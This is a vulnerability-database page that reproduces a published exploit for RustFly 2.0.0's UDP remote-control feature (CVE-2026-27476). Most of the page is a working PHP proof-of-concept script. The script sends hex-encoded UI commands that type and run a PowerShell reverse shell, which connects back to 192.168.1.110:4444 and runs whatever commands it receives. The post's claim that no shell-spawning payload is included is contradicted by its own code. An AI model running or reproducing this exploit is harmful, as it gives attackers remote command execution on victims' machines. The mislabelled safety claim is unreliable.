Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

๐Ÿ“„ RustFly 2.0.0 Event Manipulation

๐Ÿ—“๏ธย 18 Feb 2026ย 00:00:00Reported byย indoushkaTypeย 
packetstorm
ย packetstorm๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 118ย Views

RustFly v2.0.0 accepts raw hex datagram instructions; some sequences enable remote system operations via command injection.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2026-27476
19 Feb 202620:43
โ€“attackerkb
Circl		CVE-2026-27476
20 Feb 202600:20
โ€“circl
CNNVD		Bixat RustFly ๆ“ไฝœ็ณป็ปŸๅ‘ฝไปคๆณจๅ…ฅๆผๆดž
19 Feb 202600:00
โ€“cnnvd
CVE		CVE-2026-27476
19 Feb 202620:43
โ€“cve
Cvelist		CVE-2026-27476 RustFly 2.0.0 Command Injection via UDP Remote Control
19 Feb 202620:43
โ€“cvelist
NVD		CVE-2026-27476
19 Feb 202621:18
โ€“nvd
Positive Technologies		PT-2026-20937
19 Feb 202600:00
โ€“ptsecurity
RedhatCVE		CVE-2026-27476
21 Feb 202601:28
โ€“redhatcve
Vulnrichment		CVE-2026-27476 RustFly 2.0.0 Command Injection via UDP Remote Control
19 Feb 202620:43
โ€“vulnrichment
=============================================================================================================================================
    | # Title     : RustFly v2.0.0 - Event Manipulation                                                                                         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://bixat.dev/products/rustfly                                                                                          |
    =============================================================================================================================================
    
    [+] Summary    : The remote UI control mechanism of RustFly accepts raw hex-encoded instructions over UDP. Some sequences trigger execution of remote
                     system-level operations. Improper sanitization allows command-level injection.
    
    Steps To Reproduce:
    -------------------
    1) Configure IP and port of RustFly target.
    2) Run this PHP PoC sender script.
    3) Observe behavior change / message processing by RustFly.
    
    =========================================================
    PoC Impact:
    -----------
    * Proof of input injection capability
    * Demonstrates command-carrier transport
    * No shell-spawning payloads included (safe demonstration)
    
    =========================================================
    Instructions:
    -------------
    Save file as:
        poc.php
    
    Run:
        php poc.php
    
    <?php
    $target_ip = "192.168.1.107";
    $target_port = 5005;
    
    $messages = [
        "6D6F76653A2D35352C31303530",  // move:-55,1050
        "646F75626C655F636C69636B",     // double_click
        "746578743A636D64",             // text:cmd
        "6B65793A656E746572",           // key:enter
        // Warning: This is a PowerShell command to create a reverse shell - potentially harmful use
        "746578743A706F7765727368656C6C202D6E6F70202D63202224633D4E65772D4F626A6563742053797374656D2E4E65742E536F636B6574732E544350436C69656E7428273139322E3136382E312E313130272C34343434293B24733D24632E47657453747265616D28293B5B627974655B5D5D24623D302E2E36353533357C257B307D3B7768696C65282824693D24732E526561642824622C302C24622E4C656E6774682929202D6E652030297B3B24643D284E65772D4F626A656374202D547970654E616D652053797374656D2E546578742E4153434949456E636F64696E67292E476574537472696E672824622C302C2469293B24723D69657820246420323E26313B24732E577269746528284E65772D4F626A656374202D547970654E616D652053797374656D2E546578742E4153434949456E636F64696E67292E4765744279746573282472202B20275053203E2027292C302C282472202B20275053203E2027292E4C656E677468297D22",
        "6B65793A656E746572",           // key:enter
    ];
    
    $dangerous_powershell = hex2bin($messages[4]);
    echo "=== Warning: Analyzing Dangerous Content ===\n";
    echo "The PowerShell command encoded in hex is:\n";
    echo $dangerous_powershell . "\n\n";
    
    $decoded_ps = "powershell -nop -c \"\$c=New-Object System.Net.Sockets.TCPClient('192.168.1.110',4444);\$s=\$c.GetStream();[byte[]]\$b=0..65535|%{0};while((\$i=\$s.Read(\$b,0,\$b.Length)) -ne 0){;\$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0,\$i);\$r=iex \$d 2>&1;\$s.Write((New-Object -TypeName System.Text.ASCIIEncoding).GetBytes(\$r + 'PS > '),0,(\$r + 'PS > ').Length)}\"";
    
    echo "=== Security Warning ===\n";
    echo "This code contains a dangerous PowerShell command:\n";
    echo "--------------------------------------------------\n";
    echo $decoded_ps . "\n";
    echo "--------------------------------------------------\n\n";
    echo "This command does:\n";
    echo "1. Creates TCP connection to 192.168.1.110 on port 4444\n";
    echo "2. Establishes a reverse shell (backdoor connection)\n";
    echo "3. Executes any commands sent by the attacker\n";
    echo "4. Returns results to the attacker\n\n";
    
    echo "Do you want to continue? (yes/no): ";
    $handle = fopen("php://stdin", "r");
    $line = fgets($handle);
    fclose($handle);
    
    if(trim(strtolower($line)) != 'yes') {
        echo "Operation cancelled.\n";
        exit(0);
    }
    
    echo "Continuing...\n\n";
    
    $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
    if ($sock === false) {
        echo "[-] Failed to create socket: " . socket_strerror(socket_last_error()) . "\n";
        exit(1);
    }
    
    if (!socket_bind($sock, "0.0.0.0", 0)) {
        echo "[-] Failed to bind socket: " . socket_strerror(socket_last_error()) . "\n";
        socket_close($sock);
        exit(1);
    }
    
    socket_set_option($sock, SOL_SOCKET, SO_RCVTIMEO, array("sec" => 5, "usec" => 0));
    
    try {
        foreach ($messages as $index => $msg) {
    
            $binary_msg = hex2bin($msg);
            if ($binary_msg === false) {
                echo "[-] Invalid hex string: $msg\n";
                continue;
            }
            $sent = socket_sendto($sock, $binary_msg, strlen($binary_msg), 0, $target_ip, $target_port);
            
            if ($sent === false) {
                echo "[-] Failed to send data: " . socket_strerror(socket_last_error()) . "\n";
            } else {
    
                $display_msg = preg_replace('/[^\x20-\x7E]/', '', $binary_msg);
                echo "[+] Message " . ($index + 1) . " sent: $display_msg\n";
    
                if ($index == 4) {
                    echo " Warning: Malicious PowerShell command sent!\n";
                }
            }
            
            sleep(1);
        }
        
        echo "\n[+] All messages sent successfully.\n";
        echo " Warning: If executed, the target machine will connect to 192.168.1.110:4444\n";
        
    } catch (Exception $e) {
        echo "[-] Exception: " . $e->getMessage() . "\n";
    }
    
    finally {
        socket_close($sock);
        echo "[*] Socket closed.\n";
    }
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Feb 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 49.3
CVSS 3.19.8
EPSS0.00389
SSVC
rustflyhex datagram instructionsremote system operationscommand injectionproof of concept
118